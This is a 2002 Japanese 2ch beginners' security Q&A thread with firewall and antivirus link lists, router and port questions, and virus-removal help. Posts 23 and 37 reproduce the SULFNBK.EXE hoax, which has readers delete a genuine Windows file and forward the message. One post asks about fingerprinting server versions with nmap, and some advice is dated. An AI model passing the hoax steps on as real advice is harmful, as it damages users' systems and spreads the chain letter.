5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■ 初心者用質問スレッド Part6 ■

1 :名無しさん@お腹いっぱい。:02/01/14 05:13
セキュリティ関係で、どこに質問したら良いかわからない人は
こちらにどうぞ。

前スレhttp://pc.2ch.net/test/read.cgi/sec/1008322606/l50

関連リンク >>2-50
各種ファイヤーウォール ログ解析ツール スパイ発見 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報などは>>2-3
関連スレ・関連板は>>3-5
その他>>4-10
ずれていたら>>1-20参照

2 :名無しさん@お腹いっぱい。:02/01/14 05:13
【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Tiny Personal Firewall http://www.tinysoftware.com/
Agnitum Outpost http://www.agnitum.com/download/outpostfree.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/
【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.de/downloads.html
【日本語パッチ 等】
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

[ウィルス情報]
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp

3 :名無しさん@お腹いっぱい。:02/01/14 05:14
[過去スレ・関連スレッド・関連板]

Part5 http://pc.2ch.net/test/read.cgi/sec/1008322606/l50
Part 4 http://pc.2ch.net/test/read.cgi/sec/1006374515/l50
Part 3 http://pc.2ch.net/test/read.cgi/sec/1000914322/

最強のファイアーウォールソフトって何かな?http://pc.2ch.net/test/read.cgi/sec/988724444/l50
ZoneAlarm Part4 http://pc.2ch.net/test/read.cgi/sec/1010834959/l50
Tiny Personal Firewall Part2 http://pc.2ch.net/test/read.cgi/sec/1006423282/l50
Agnitum Outpost http://pc.2ch.net/test/read.cgi/sec/997301454/l50
_■■BlackICEスレ■■_ http://pc.2ch.net/test/read.cgi/sec/992171869/l50
SygatePersonalFireWall http://pc.2ch.net/test/read.cgi/sec/993936202/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
Norton Internet Security2002 Ver.4 http://pc.2ch.net/test/read.cgi/sec/1009681166/l50
ウイルスバスター2002 Part2 http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
マカフィーってだめなの!PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50

AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

☆ウィルス情報&質問 総合スレッド☆ http://pc.2ch.net/test/read.cgi/sec/1010948022/l50

スパイウエア発見専用ソフト「Ad-aware」 http://pc.2ch.net/test/read.cgi/sec/1003749900/l50

4 :名無しさん@お腹いっぱい。:02/01/14 05:14
[Windows板] 広告カットとファイヤーウォールソフ ト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板] 自分のパソコンへの不正侵入対策してますか?2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者@2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク@2ch掲示板 http://pc.2ch.net/hack/
windows@2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://pc.2ch.net/download/
パソコン一般@2ch掲示板 http://pc.2ch.net/pc/

5 :名無しさん@お腹いっぱい。:02/01/14 05:14
「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

○ネットセキュリティー板 質問、雑談スレッド[3]○http://pc.2ch.net/test/read.cgi/sec/1006859839/l50
くだらねぇ質問はここに書き込め Ver2.13 http://pc.2ch.net/test/read.cgi/sec/1009795619/l50
ファイアーウォールソフト 総合スレッド Part2 http://pc.2ch.net/test/read.cgi/sec/991646115/l50

6 :名無しさん@お腹いっぱい。:02/01/14 05:16
前スレhttp://pc.2ch.net/test/read.cgi/sec/1008322606/l50

前スレが950になったら徐々に移行してください

7 :名無しさん@お腹いっぱい。:02/01/14 06:43
>>2
【日本語パッチ】
Outpost 始めから日本語で使用可

8 :名無しさん@お腹いっぱい。:02/01/14 06:50
キーボードのCtrlキーとFキーを同時に押すとページ内検索が出来ます
これで過去スレ・関連スレッド等の文章の中から
目的の単語を検索することが可能です

9 :名無しさん@お腹いっぱい。:02/01/14 09:09
(210.150.***.***)yuhei.comって何でしょうか?この前、
netstat -anで接続中だったのですが・・すぐ切れましたけどね。
2chに関係ある所ですか?

10 :名無しさん@お腹いっぱい。:02/01/15 03:10
広告削除ソフト何使ってる? 書き込めゴルァ!!http://pc.2ch.net/test/read.cgi/sec/1010766715/l50

11 :名無しさん@お腹いっぱい。:02/01/15 05:41
age

12 :名無しさん@お腹いっぱい。:02/01/15 07:22
>>9
IPアドレス自慢と思われ
210.150.210.150
2ch.とは関係なさげ

hiroyuki.com
www.hiroyuki.com
61.115.234.57
こっちも2ch.とは関係なさげ

13 :名無しさん@お腹いっぱい。:02/01/15 07:31
そういえば、ちょっと前に
「netstatするとyuhei.comからアクセスされてます」
ってスレが立ってたな。アッというまに消えたけど(w

14 :チュン坊:02/01/15 10:16
某ADSL接続(固定IP)で接続してるんですけど、ルーターに
Port137&138のパケットログが数秒おきにたまっってるのを
見つけたのですが、これは無視してよいものですか?

ちなみに似たようなIPアドレスからなので、同じプロバ契約者
のPCからだと思うんですけど。
例)
自分が111.222.333.444だとして111.222.333.***→111.222.333.255
へのPort137,138のログがたまっていきます。***はひとつでなく
複数です。

ルーターはメルコBLR2-TX4どす。

15 :名無しさんに接続中…:02/01/15 11:32
>>14
結論だけ書くと「無視して結構です」。

16 :チュン坊:02/01/15 11:47
>>15
レスどうもありがとうございます。とりあえず無視します。

・・・がこれってセキュリティ対策サイト等で自分なりに
得た知識からすると、パケット飛ばしてる相手がNetBios
Tcp/IPを有効にしているからなのでしょうか?つまりその
人達はセキュリティ的にやばい状態だったりしますか?
それとも全く見当違いですか?

ん〜できればWAN側の無駄なパケットが来ないようにす
る方法とか知りたいんですよねぇ。プロバに言えば対策
してくれるのかな。こちらがネット接続して無くてもルーター
のランプがパケット到着時に点滅してうざいし・・・

17 :名無しさんに接続中…:02/01/15 13:20
>>16
> つまりその人達はセキュリティ的にやばい状態だったりしますか

します

> WAN側の無駄なパケットが来ないようにする方法とか知りたいん
> です

勝手に飛んでくるものはどうしようもないです。
どうしようもないので、それを捨てるモノがルーターなのです。

> プロバに言えば対策してくれるのかな。

そんなプロバイダはろくなプロバイダではないでしょうね。

18 :名無しさん@お腹いっぱい。:02/01/15 13:22
POP3Proxyにはどんな機能があればいいですか?

19 :名無しさん@お腹いっぱい。:02/01/15 13:41
DQNな僕に教えてください。2chやってる最中に突然長方形の枠があらわれました。白い画面でこれから何か表示されようとしてたみたいですが怖くなって、すぐに2ch切ました。
もしかして誰かが自分のパソコンに悪さしたのでしょうか?
もしかしてハッキングとかいう奴でしょうか?

20 :ななし:02/01/15 13:56
OS、やブラウザ名くらい書こうよ>19

21 :19:02/01/15 15:32
OSってWINDOWSXPでいいでしょうか?
プラウザはインターネットエクスプローラーです。

22 :名無しさん@お腹いっぱい。:02/01/15 15:46
>>19気にスンナ。

23 :名無しさん@お腹いっぱい。:02/01/15 18:12
1.スタートメニュー→検索→ファイルやフォルダ
2.検索条件の所に”sulfnbk.exe"と打つ。(ウィルスの名前)
3.探す場所はCドライブで。
4.検索開始
5.検索結果で見つかったファイルが黒いアイコンであればそれがウィルス。  ファイル名が”sulfnbk.exe"である事を確認して、絶対に開かないで下さい。
6.そのファイルを右クリック→「削除」
7.ゴミ箱に移してもいいですか というメッセージが出てくる→「はい」
8.デスクトップに戻って、「ごみ箱」のアイコンを右クリック→「ごみ箱を空にする」
9.もしウィルスが出てきたら、そちらのアドレス帳に入ってる人にも感染している可能性が高いらしいので、このメールを送ってください
自分のパソコンからも出てきたので驚きました。皆さんも気をつけてください。
詳しい情報、感染情報が入ったらレスしてください。

オカ板見てたらこんなレスあったんですけど
ほんとうですか?

24 :名無しさん@お腹いっぱい。:02/01/15 18:14
>>23
デマ。

25 :名無しさん@お腹いっぱい。:02/01/15 18:22
>>24
消すとどうなりますか?

26 :>24 飛・び・ま・す!:02/01/15 18:47
 

27 :  :02/01/15 18:47
ノートン入ってれば不正アクセスは「絶対に」遮断できる?

28 :>27:02/01/15 19:00
常時接続の時代が到来して、個人のPCのセキュリティについていろいろなところで取り上げられています。
そして、多くの人たちが自分のインターネット環境のセキュリティに関心を持ちはじめています。
これは、とても良いことでです。でも、
何か勘違いをしていませんか
セキュリティベンダーに騙されていませんか?

ルータでブロックする
coregaなどで販売しているブロードバンド用のルータはとても便利です。IPマスカレードで利用すれば
デフォルト状態でも基本的に外部からの不要なパケットを通しません。値段も14000円程度なので是非導入してください。
パーソナルファイアーウォールソフトでブロックする <要注意>おすすめしません!!
パーソナルファイアーウォールソフトウエアでブロックする方法をセキュリティソフトウエアベンダーはPRしていますが、
これは危険です。もちろん外側にルータがあればよいですが、ソフトウエアだけの場合は、悪意のあるパケットは確実に
あなたのPCにまで到達しています。そして、このパーソナルファイアーウォールソフトウエア自体が、
不要なサービスの一つであり使用不能攻撃の対象になってしまいます。もちろんルータとの併用ならOKです。

29 :>27 セキュリティベンダーに騙されています。:02/01/15 19:01
パーソナルファイアーウォールソフトウエア
外部からの不正アクセス対策としては、「おすすめしない」とコメントしましたが、
内部からの不正アクセスに対してはかなり利用価値があります。
特に悪意のあるプログラム(ウイルスではない)が内部で動作し、
外部に対して情報を送信しようとしているような時に、これを阻止することができるからです。
このような内部からの情報発信は外部のルータなどでは阻止しにくいので、パーソナルファイアーウォールが有効です。

30 :ここから転載。:02/01/15 19:02
http://210.143.99.143/~p-sec/

31 : :02/01/15 20:15
ありがとう
ちょっと勉強します
ルーターって知ってたんですが・・・
ソフトウェアだけでいいのかと思っていた

32 :名無しさん@お腹いっぱい。:02/01/15 20:18
フリーのアンチウィルスソフトを決め兼ねています。
AVGとAntivirはどちらがウィルスの検出率が高いですか?
更新頻度はどうなんでしょうか?
どちらも常駐して、裏で常時ウィルス監視してくれてるんですか?

アンチドート簡易版はファイル定義の更新はマメでも常駐はしてくれないで
任意の時にチェックするだけですよね?
これならオンラインのウィルススキャンの方がいいかな、と思っていますがどうなんでしょう。

33 :名無しさん@お腹いっぱい。:02/01/15 20:23
>>32
Antidoteはネットに接続できない状況でも
他のパソコンで落としたやつを
フロッピーディスクで持ち運びできるので
緊急時には便利だよ。

34 :名無しさん@お腹いっぱい。:02/01/15 20:28
>>32
>>32
どっちも常駐監視あり。
AVGとAntivirは、片方ずつ使ってみて、
好みで決めればいいんじゃない?
ここで、コッチのがいいよ、なんていっても
人それぞれみたいだから。ちなみに自分はAntivir。

35 :9:02/01/16 01:27
>>12
ありがとうです。・・結局何なんでしょうか?危険は無いですか?
IPアドレス自慢て・・?意味分からんです。よければ教えてくださいませ(;´Д`)

36 :9:02/01/16 01:36
>>13
ちなみにそのスレ立てたの俺じゃないです・・最初にgoogleで
検索してそのスレ見つけたんですが、dat落ちしてやがったので・・ここで訊いてみました。
確か3レスぐらい付いてたような・・(藁 答えは出てるんだろうか・・。

37 :名無しさん@お腹いっぱい。:02/01/16 01:43
以下のメールが届き、無知な俺は勢いで削除してしまいました。
SULFNBK.EXEはウイルスじゃないですよね?
元に戻すのはムリでしょうか?

>ごめん!!
>私のメル友の友達がウィルスが感染してしまったみたい!
>私のメル友はウィルスファイルを開かなかったから良かったけど
>ウィルスのせいで、感染しなくてもアドレス帳に登録されてる友達
>みんなにそのウィルスが勝手に送られてるらしいんだ。
>というわけで、次に説明する手順でウィルスファイルを早急に削除
>して下さい!!

>ちなみに、このウィルスは14日間眠ってるんだけどそれを過ぎる
>とハードディスクを破壊し始めるらしいから、必ず早急に削除してね。

>手順:1.「スタート」で「検索」のトコの
>「ファイルやフォルダ」をクリック

>2.検索条件の名前の欄に『sulfnbk.exe』と打ちます。
>これがウィルスの名前です。

>3.探す場所はローカルディスク(C:)であることを確認。

>4.検索開始ボタンを押す。

>5.検索して見つかったファイルが黒いアイコンであれば
>それがウィルスです。
>そのファイル名が『SULFNBK.EXE』であることを確認する。
>絶対に開かないでください!!!これ絶対っ!

>6.そのファイルを右クリックし、「削除」してください。

>7.「ゴミ箱に移してもいいですか」のメッセージが
>出てきたら「はい」

>8.デスクトップ画面のゴミ箱アイコンをクリックし、
>「ゴミ箱を空にする」をクリックしてください。

>もしこのウィルスがコンピューターから検出されたら、
>アドレス帳に登録されてる人、全員にこの削除に関するメールを
>送ってね。本当にごめんね!!

38 :ななし:02/01/16 01:48
>37
ここの下の方を参照
http://www.nai.com/japan/virusinfo/sulfbk_hoax.asp

39 :名無しさん@お腹いっぱい。:02/01/16 02:02
>>38

>「リストア元の選択」フィールドで、WINDOWS CABファイルまでのパスを入力
>(例1:C:\WINDOWS\OPTIONS\INSTALL)

例の通り入力したのですが、ファイルが見当たらないそうです。
CABファイルまでのパスとは?

40 :38:02/01/16 02:20
>39
ファイル検索して、それらしいモノを探す
または、例2のように、CD-ROM ドライブに、OS のCD-ROM入れて、
(例2:D:\WIN98 ※DにはCD-ROMがあてがわれているドライブのアルファベットが入ります。)
とやってみるではどうでしょうか?

41 :名無しさん@お腹いっぱい。:02/01/16 02:44
>37
定期的に全く同じ文面があちらこちらの板・スレッドにコピペされるのは
いったいどういう意図でなのでしょう?

42 :名無しさん@お腹いっぱい。:02/01/16 02:52
>>40
SURFNBKを含む文字列で検索しましたが、検出されませんでした。
OSはインストール済だったので、CD-ROMが同梱されてないんですよね。
リストア機能に進めないとなると、システムを復元するしかないですかね?
復元ポイントまで戻って。でもそれでリストアされるのでしょうか?

43 :名無しさん@お腹いっぱい。:02/01/16 02:55
>>41
自分にはよくわかりません。
また、それは自分が意図して行っているものではありません。
最近メールが送信されてきたので、対処法を尋ねているだけです。

44 :40:02/01/16 03:03
>42
「CAB」ファイルを検索というつもりで、書いたのですが。
システムの復元て事は、OS は、Me ですね?
すいませんがWin98使用なので、それでリストアできるかどうか、良く判らないです

45 :名無しさん@お腹いっぱい。:02/01/16 03:26
>>42
OSのCD-ROMが同梱されてないPCなんて見た事ないが?
なんで持ってないのだ?

46 :名無しさん@お腹いっぱい。:02/01/16 04:46
>>42
Meの場合は、PRECOPY1.CAB だ。
検索でこれを C: 以下から探せ。

47 :名無しさん@お腹いっぱい。:02/01/16 04:54
>>37
>ウィルスのせいで、感染しなくてもアドレス帳に登録されてる友達
>みんなにそのウィルスが勝手に送られてるらしいんだ。

よく読むとスゴイこと書いてあるけど、
皮肉なことにシッカリそれを実行する人がいる…

「感染しなくてもアドレス帳の全アドレスにメール送り、
 かつシステムファイルを削除する方法」すなわちそれは…

48 :名無しさん@お腹いっぱい。:02/01/16 04:55
>45
ネタだからだろ?

49 :名無しさん@お腹いっぱい。:02/01/16 05:02
>>9=36
つまりそれは、あなたが yuhei.com に
アクセスしていたということでは?

50 :名無しさん@お腹いっぱい。:02/01/16 07:49
>>44
ですよね(藁
そのSUFNBKが消えたから困っているのに。

>>45
アプリケーションのCDしか同梱されてないみたいですね。
考えてみたらリカバリーできない…。

>>46
C:\WINDOWS\OPTIONS\CABS\PRECOPY1.CAB ですね?
ブツは見つかったんですが、やはりファイルえお抽出できません。

51 :名無しさん@お腹いっぱい。:02/01/16 09:02
>>50
> アプリケーションのCDしか同梱されてないみたいですね。
> 考えてみたらリカバリーできない…。
中古ナノカニャ?
ソーデナキャ、ソノCDリカバリディスクダロウニ...
チューコデナイナラセツメーショグライヨメYO

52 :名無しさん@お腹いっぱい。:02/01/16 09:10
さっき書き込もうとしたら2ch.netから連続10回ぐらいの
攻撃がきたんだけどどーゆーこと?

53 :名無しさん@お腹いっぱい。:02/01/16 09:21
>52
プロクシチェックのためにポートスキャンしてるみたいよ

54 :52:02/01/16 09:42
>>53
なるほど、即レスサンクス。
一瞬2ch関係者に狙われたのかと思ったよ(藁

55 :名無しさん@お腹いっぱい。:02/01/16 13:38
当方 ACCA で PPPoA の ADSL 環境なので、内側にローカル
アドレスしか振ってくれず、FreeBSD で FireWall を構築しても
ADSL モデムを守る事ができません。
別にこの状態でも危なく無いのでしょうか?

危なくないのなら、FireWall 自体なくして、直接ケーブルを HUB に
接続しても同じ事なのでしょうか?

56 :名無しさん@お腹いっぱい。:02/01/16 15:41
>>55
個人目当てのハッキングなんてめったにないから
それほど過敏にならなくてよい
個人のモデムがやられたなんて話は聞いた事がない

57 :名無しさん@お腹いっぱい。:02/01/16 16:03
>>56
まぁ、そうですよね。少し安心しました。

一応 ADSL モデムの設定でグローバルアドレス側からの
設定変更はできないようになってるみたいなのですが、
(ブラウザでの操作なので) Port80 にアクセスできないのか
取り敢えず繋がって httpd が弾くのかとか、色々考えてしまい
今まで プルプル してましたよ。

ああ、FreeBSD で PPPoA ができるという情報さえ見つかれば
ある程度好き勝手できるのですが。

58 :9:02/01/16 16:29
>>9ですが、これそうですよね
http://210.150.210.150/sage/images/mona.gif<yuhei.com
各板の背景画像が置いてあるのもここなの?ソース見ても相対パス
になってるから分からん。。とにかく2chに関係あるところみたい(?)なので・・
それが分かっただけでもよかったです。きっと禿しくガイシュツなんですね・・スマソ。

59 :名無しさん@お腹いっぱい。:02/01/16 22:31
>>51
リカバリーCDを発見しました。ただ、以下の例のごとく入力しようにも、
該当機種専用のリカバリーCDであるためD:以下に何と入れればいいかわかりません。
D:\WINMeだと撥ねられますし、どうしたらいいでしょう?

>例2:D:\WIN98 ※DにはCD-ROMがあてがわれているドライブのアルファベットが入ります。

60 :名無しさん@お腹いっぱい。:02/01/16 22:37
>>59
リカバリーCDいろいろあるからね。
ディスクイメージファイルになってるのもあるし。
それだと全部どこかへ展開しなくちゃいけない。

61 :49:02/01/16 22:40
>>58=9
ようするに、やっぱり
あなたが yuhei.com にアクセスしていたということだな。

62 :名無しさん@お腹いっぱい。:02/01/16 22:44
>>60
IBMなんですが、どうしたらいいでしょう?
展開の仕方がよくわかりません。

63 :名無しさん@お腹いっぱい。:02/01/16 22:52
>>62
とりあえず、既に板違いになってるから。
ここから先はパソコン一般版かなんかで訊いてもらえますか?

64 :名無しさん@お腹いっぱい。:02/01/16 22:54
>>63
あ、申し訳ない。そのようにします。
ありがとうございました。

65 :名無しさん@お腹いっぱい。:02/01/17 00:01
トレンドマイクロのページでオンラインウィルス検索をしたところ
何個か検索されたので削除しようとしたら、
「〜は現在使用中なので削除できません」と言われました。どうすればいいんですか?

66 :素人サーバー”管理”者:02/01/17 00:16
どこに書いていいのかわからないのですが
教えて下さい

メールサーバーを管理しています
不特定多数のとこより
無いユーザー向けにメールが大量に送られてきます
@の前をランダムに変更して送ってくるのですが
送り主が一定じゃないので防ぎようが無いのですが
うらみでも買ったのでしょうか?
祭りが終わるまで 何の対策もうてないのでしょうか?
使用サーバー コバルトRaQ sendmail
板違いでしょうか?

67 :64:02/01/17 00:23
同じ症状の方のために一応報告しておきます。

http://www.microsoft.com/japan/technet/security/virus/false/sulfnbk.asp

上記のやり方で試しても復元できなかったので、リカバリーする前に
削除前の復元ポイントに戻ってシステムの復元を実施しました。
結果、検索するとsulfbkn.exeが存在しているため、恐らく成功した
と言えるでしょう。何故ファイルを抽出できなかったかは、
いまもって不明ですが。

68 :名無しさん@お腹いっぱい。:02/01/17 00:44
ホームページなんかに訪れると、運営側には
訪れた人の履歴やcookieなどが、わかってしまうって話しを聞くんですけど。
企業やショップは、訪れた人の道筋をたどって傾向を知ったりするらしいですね。
何か見られてるようで気持ち悪いんですけど、、、。
どんな仕組みになっていて、どの程度わかるんですか?。
とりあえず、履歴を残さない様にするのと、cookieを受け付けない様にしてます。
他はキャッシュを空にするとか、履歴を空にするとか?。
こちらの情報がでない様にしたいんですけど、どうしたらいいですか?。
act2からでてる、Net Barrierとかはcookie、履歴の流出防止だそうですが、、

69 :名無しさん@お腹いっぱい。:02/01/17 01:13
すいません、質問させてください。

メールのやりとりをした事がない人からメールが来ました。
アドレスは *****_*@****.net.(ドメインは外国の会社)
サブジェクトは日本語。
本文は意味不明なアルファベットの羅列(記号やカナは一つもなく全てアルファベット
だったので文字化けではない、と思います)
添付ファイルは無し。

アドレスの一部にアンダーバーが付いている事と本文のアルファベット羅列に
ウィルスメールの可能性を考えたのですが、添付ファイルが無いこともあって
判断できません。
添付ファイルのないウィルスメールもあるのでしょうか?

#ちなみにメールは転送した携帯でチェックしたので、まだ自PCでは開いていません。
もし添付のないウィルスメールが存在するのなら開く事なく破棄しようと思っています。

70 :カポネ:02/01/17 01:16
sendmailのリレーについて勉強してます。
いろんな情報をメールで教えて下さい。

71 :名無しさん@お腹いっぱい。:02/01/17 01:40
>>65
常駐すべて切ってやれ
つーかオンラインはあてにならない部分もあるから製品版を買え

>>66
はじけばいいんじゃないのか?
文句言うなら相手のドメイン先に言ってもいいけど

72 :名無しさん@お腹いっぱい。:02/01/17 01:41
>>69
ウイルスかどうかはウイルスチェックすればすむだろ
見た事ないメールなら即破棄しろ
なんで興味なんか持つのだ?

>>70
勉強なら本見ろ タコ

73 :ななし:02/01/17 02:15
>68
>こちらの情報がでない様にしたいんですけど、どうしたらいいですか?。
>act2からでてる、Net Barrierとかはcookie、履歴の流出防止だそうですが、、
質問しなくても自分で解決しているんじゃないのか?

>69
添付書類のデコードがうまくいかなかっただけでしょう。
その文字列を正しくデコードすれば、
添付書類(おそらくウィスル)が出来ます、たぶん

74 :65:02/01/17 02:20
教えてクンの上にスレ違いな気もしますがもう一回だけ質問させて下さい・・・

取り敢えず、ウィルスバスターの体験版をダウンロードして検索しました。
オンラインと同様の結果が出たので削除しようとしたんですが、やはり
「このファイルは使用中なので削除できません」と出ました。
常駐もすべて切ったのですが・・・。他に何か考えられる理由はありますか?

75 :名無しさん@お腹いっぱい。:02/01/17 02:24
サーバ初期化したら、カンコックとチュゴクの
IPアドレスブロックリスト消えちゃたYO

どなたか教えてください。

76 :ななし:02/01/17 02:27
>74
OSは? そのファイル名は?
情報は、キチンと書くこと

>75
前に設定した時と同じやりかたで、再設定する

77 :75:02/01/17 02:33
>>76

61.*.*.*/12? とかいう具合に
数十行あったから、憶えてないんですよ。

ログがいっぱいになって困ってます。

78 : :02/01/17 02:39
https://grc.com/x/ne.dll?bh0bkyd2
このページで自分のポートを調べた際
port5000 UPnPがオープン状態になっているのですが
これってよろしくないですよね。。。?
WindowsUpdateはすべて完了してあるのですが、
この他に何をすれば閉じる事が出来るのでしょうか?
ちなみにOSはXPです。

79 :78:02/01/17 02:42
あれ?あれ?
今、再測定してみたらちゃんとクローズになってました。。。
すいません、お騒がせしました。

80 :名無しさん@お腹いっぱい。:02/01/17 02:45
>>77
覚えてないなら次にスキャンあった時にブロックすればいいだろ
ログがいっぱいなら消せよ

81 :74:02/01/17 02:52
OSはwinMeで、ブラウザはInternet Explorer 5.0のSP2、メールソフトはポスペです。
WORM_BADTRANS.BとWORM_HYBRIS.Mの二種に感染しているようです。
WORM_BADTRANS.Bのファイルが
c:\_RESTORE\ARCHIVE\FS314.CAD内のA0037525.CPY、
c:\_RESTORE\ARCHIVE\FS255.CAD内のAOO27448.CPY、
c:\_RESTORE\ARCHIVE\FS250.CAD内のAOO25901.CPYの3つ、
WORM_HYBRIS.Mのファイルが
c:\_RESTORE\ARCHIVE\FS135.CAD内のA0012518.CPYの1つ、計4つでした。

82 :名無しさん@お腹いっぱい。:02/01/17 02:56
コンパネの中にあるシステムの復元をするのチェックをはずして再起動
それからもう一回チェックしてみれ

83 :名無しさん@お腹いっぱい。:02/01/17 02:59
追加
コンパネ→システム→何だっけ…
忘れた
すまん!

84 :76:02/01/17 03:03
>74
http://pc.2ch.net/test/read.cgi/sec/1008355163/n7

85 :74:02/01/17 03:30
>>82
「システムの復元をしない」のボックスをオンにして再検索してみたら
何とウィルスは発見されず・・・・・でした
?????(;´Д`)

>>84
有り難うです。早速見てみます

86 :名無しさん@お腹いっぱい。:02/01/17 03:32
バカMEがバックアップ取ってただけだよ
気にするな

87 :74:02/01/17 03:35
一回も「削除しました」などとは出ませんでしたが
実はもう成功していたという事でしょうか?

88 :74:02/01/17 04:14
何回かチェックしてみたり動作を確認したりしてみましたが
どうやら削除には成功した模様です。
アドバイスをどうも有り難う御座いました

89 :通りすがり:02/01/17 04:18
Meの復元用バックアップの中にあっただけ。
「復元しない」の設定にしたら、
その時点でそれまでのバックアップが消える。
ようするに >>86 の言うとおりだよ。

90 : :02/01/17 04:19
hotlineに繋いでたらいきなり音楽が鳴って、
きがついたら接続が切れていました。
でも、モニタ上では繋がってるんです。
でも実際には全然、繋がってないので、ルーターを見たら切れてました。
そして一度、接続アプリを終了してから再度接続しようとしたら
接続できなくなってしまい、接続設定をし直せっていうので
やろうと思ったけど接続設定の画面にたどり着けなくなってしまいました。
ルーター本体の電源を一度落としたら接続できるようになったんですが
これってハッキングされたのでしょうか?

91 :名無しさん@お腹いっぱい。:02/01/17 04:19
test

92 :小心者:02/01/17 04:29
IP調べておまえの個人情報晒すぞって言われました、恐くて眠れません
、誰か助けてください、IPから個人情報わかるのですか?

93 :名無しさん@お腹いっぱい。:02/01/17 04:37
>>92
ネット接続環境ぐらい書いてくれ

94 ::02/01/17 04:44
内容:
2chでロス在住とか嘘を書いてしまったのですが、
IP盗まれてばれることはありますか?

95 :名無しさん@お腹いっぱい。:02/01/17 04:53
無料ソフトでセキュリティ最強にしょうとしたら
何を取り込めばいいですか?

96 :名無しさん@お腹いっぱい。:02/01/17 04:55
>>95

ZoneAlarm>ウィルスバスター2002体験版でも入れとけよ。

97 :名無しさん@お腹いっぱい。:02/01/17 04:57
ただ動画が重いから、動画が欲しい奴は容量がでかいうpロダ教えてくれないと無理です。

98 :名無しさん@お腹いっぱい。:02/01/17 04:58
ホストアドレスって何なんですか?ばれたらヤバイんですか?

99 :名無しさん@お腹いっぱい。:02/01/17 05:01
>>97
意味不明
>>98
気にするな!

100 :名無しさん@お腹いっぱい。:02/01/17 05:06
たまにIEのキャッシュにウイルスが見つかるんだけど
あんなトコに在るファイルって、実行されることあります?

101 :名無しさん@お腹いっぱい。:02/01/17 05:07
恐いんです!何なんですか〜

102 :名無しさん@お腹いっぱい。:02/01/17 05:13
ホストアドレスばれても大丈夫なんだっ!いっちょやったるか!

103 :名無しさん@お腹いっぱい。:02/01/17 05:44
なんだここは!
単なる初心者の叫びスレになってるな。

104 :名無しさん@お腹いっぱい。:02/01/17 09:31
>>100
そのファイルをわざわざ開こうとすると危険かも。
往々にしてウイルス対策ソフトが防御してくれるけど。

105 :あっきー:02/01/17 15:21
nmapとかのソフトでサーバーのFTPとかsendmailとかssh,telnetあたりの、
version調べられませんか?
ツールは何でもオッケーです。
お願いします。

106 :fingerprint:02/01/17 15:40


107 :ななしさん:02/01/17 15:55
telnetは確認していないが、FTPならtelnetで調べれるだろ



108 :名無しさん@お腹いっぱい。:02/01/17 16:01
実際に自分がウィルスに感染した場合、お詫びメールは送った方がいいですか?
それともマカーやアンチウィルス使用者にうざがられるだけですか?


109 :名無しさん@お腹いっぱい。:02/01/17 16:08
>>108
感染してますよのメールをいただいた方には
せめて簡単なお詫びメール送っといたほうが…


110 :名無しさん:02/01/17 17:09
Hotmailのパスワードの見破られないですか?
いたずらされそうで怖いです。



111 :ななし:02/01/17 17:14
>110
他のパスワードなら安全だとでも思っています?

112 :名無しさん@お腹いっぱい。:02/01/17 17:15
>>110
言ってる意味がわからん

113 :名無しさん@お腹いっぱい。:02/01/17 18:05
>>109
こっちから自分のアドレス帳の全てのメアドに「ウィルス送ったかも」という、
メールを送るのはスパム行為かもしれないと思ったんですが・・・・。

114 :名無しさん@お腹いっぱい。:02/01/17 19:33
>>113
そんなことをしても無駄。
確実に感染メールが行ってるなら、
そりゃ送ってもいいが、送信アドレスは
